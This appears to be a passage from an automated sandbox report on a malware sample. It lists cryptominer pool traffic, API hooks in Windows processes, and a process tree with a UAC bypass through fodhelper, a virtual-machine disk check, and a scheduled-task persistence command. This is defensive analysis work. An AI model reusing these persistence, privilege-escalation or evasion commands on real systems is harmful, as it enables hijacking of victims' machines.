                                                                                                                                                        Oct 8, 2024 00:25:21.017878056 CEST471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 30 62 66 39 31 62 38 30 36 66 39 35 64 33 37 65 66 32 33 39 37 35 64 63 32 62 32
                                                                                                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d0bf91b806f95d37ef23975dc2b291207abf698aef1e68aa1cf5dac554a4cc84203dd03b34000000007631affb4bfeb031c95e391c185bf74d68c1ee14fa45b03d4ec20970f366195656","job_id":"99b8c586-f334-43e0-a130-659e2
                                                                                                                                                        Oct 8, 2024 00:25:43.034385920 CEST471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 36 62 66 39 31 62 38 30 36 66 39 35 64 33 37 65 66 32 33 39 37 35 64 63 32 62 32
                                                                                                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e6bf91b806f95d37ef23975dc2b291207abf698aef1e68aa1cf5dac554a4cc84203dd03b3400000000fbd6636fbe928472006578700fea3bc85a86db9c27eb4dd010b70c21f1bdb4f860","job_id":"929b010f-106c-4c18-83e9-9380c
                                                                                                                                                        Oct 8, 2024 00:26:01.102925062 CEST471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 36 62 66 39 31 62 38 30 36 66 39 35 64 33 37 65 66 32 33 39 37 35 64 63 32 62 32
                                                                                                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e6bf91b806f95d37ef23975dc2b291207abf698aef1e68aa1cf5dac554a4cc84203dd03b340000000004ee739db28e8b4832f9993a17b7696d356935eb138b2b3ac7194dd2cff6677260","job_id":"b0dc09fd-86ad-41d1-93e5-afaec
                                                                                                                                                        Oct 8, 2024 00:26:05.033957958 CEST471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 63 62 66 39 31 62 38 30 36 66 39 35 64 33 37 65 66 32 33 39 37 35 64 63 32 62 32
                                                                                                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010fcbf91b806f95d37ef23975dc2b291207abf698aef1e68aa1cf5dac554a4cc84203dd03b3400000000379261037194b5b339132c619a16676d580f4d264156cc27b0d09d8ab91fb5716a","job_id":"c6f38ba2-83ac-4260-9138-5a28f


                                                                                                                                                        Code Manipulations

                                                                                                                                                        User Modules

                                                                                                                                                        Hook Summary

                                                                                                                                                        Function NameHook TypeActive in Processes
                                                                                                                                                        ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                                        NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                                                                        ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                                                                                                        NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                                                                                                        ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                                                                                                        NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                                        NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                                                                                                                        ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                                        ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                                                                        NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                                                                                                        RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                                                                        NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                                                                                                        NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                                                                                                        ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                                                                                                        ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                                                                                                                                                        Processes

                                                                                                                                                        Process: explorer.exe, Module: ntdll.dll
                                                                                                                                                        Function NameHook TypeNew Data
                                                                                                                                                        ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                        NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                        ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                        NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                        ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                        NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                        NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                                        ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                        ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                        NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                        RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                        NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                        NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                        ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                        ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                                        Process: winlogon.exe, Module: ntdll.dll
                                                                                                                                                        Function NameHook TypeNew Data
                                                                                                                                                        ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                        NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                        ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                        NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                        ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                        NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                        NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                                        ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                        ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                        NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                        RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                        NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                        NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                        ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                        ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                                                                                                        Statistics

                                                                                                                                                        CPU Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Memory Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                        Behavior

                                                                                                                                                        Click to jump to process

                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:18:23:51
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                        Imagebase:0x7ff7df220000
                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:1
                                                                                                                                                        Start time:18:23:51
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Users\user\Desktop\e7WMhx18XN.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\e7WMhx18XN.exe"
                                                                                                                                                        Imagebase:0x510000
                                                                                                                                                        File size:8'201'216 bytes
                                                                                                                                                        MD5 hash:38BE83AFEA1E906C05E5B851253CBC6A
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:2
                                                                                                                                                        Start time:18:23:51
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\Sgrmuserer.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\Sgrmuserer.exe
                                                                                                                                                        Imagebase:0x7ff657620000
                                                                                                                                                        File size:329'504 bytes
                                                                                                                                                        MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:6
                                                                                                                                                        Start time:18:23:51
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                                                                        Imagebase:0x7ff7df220000
                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:7
                                                                                                                                                        Start time:18:23:52
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
                                                                                                                                                        Imagebase:0x7ff7df220000
                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:8
                                                                                                                                                        Start time:18:23:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" "
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:9
                                                                                                                                                        Start time:18:23:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:10
                                                                                                                                                        Start time:18:23:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\paint.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\paint.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:2'234'368 bytes
                                                                                                                                                        MD5 hash:9CA610EB2F785C8D2DDF2A50347039ED
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:11
                                                                                                                                                        Start time:18:23:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:wmic diskdrive get Model
                                                                                                                                                        Imagebase:0x7ff67a220000
                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:12
                                                                                                                                                        Start time:18:23:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe"
                                                                                                                                                        Imagebase:0x7ff6cf670000
                                                                                                                                                        File size:11'776 bytes
                                                                                                                                                        MD5 hash:9EB62648C9CC2F1EDD3E9CEF736F9C5C
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:13
                                                                                                                                                        Start time:18:23:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
                                                                                                                                                        Imagebase:0x7ff71fdd0000
                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:moderate
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:14
                                                                                                                                                        Start time:18:23:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:/c C:\Windows\System32\fodhelper.exe
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:15
                                                                                                                                                        Start time:18:23:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:16
                                                                                                                                                        Start time:18:23:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\fodhelper.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\fodhelper.exe
                                                                                                                                                        Imagebase:0x7ff6b0580000
                                                                                                                                                        File size:49'664 bytes
                                                                                                                                                        MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:18
                                                                                                                                                        Start time:18:23:58
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"cmd.exe"
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:19
                                                                                                                                                        Start time:18:23:59
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:20
                                                                                                                                                        Start time:18:24:00
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe"
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:21
                                                                                                                                                        Start time:18:24:02
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:22
                                                                                                                                                        Start time:18:24:02
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:23
                                                                                                                                                        Start time:18:24:02
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
                                                                                                                                                        Imagebase:0x7ff7c0d70000
                                                                                                                                                        File size:235'008 bytes
                                                                                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:24
                                                                                                                                                        Start time:18:24:03
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:2'234'368 bytes
                                                                                                                                                        MD5 hash:9CA610EB2F785C8D2DDF2A50347039ED
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:25
                                                                                                                                                        Start time:18:24:04
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe"
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:26
                                                                                                                                                        Start time:18:24:04
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:27
                                                                                                                                                        Start time:18:24:04
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:2'234'368 bytes
                                                                                                                                                        MD5 hash:9CA610EB2F785C8D2DDF2A50347039ED
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:29
                                                                                                                                                        Start time:18:24:06
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
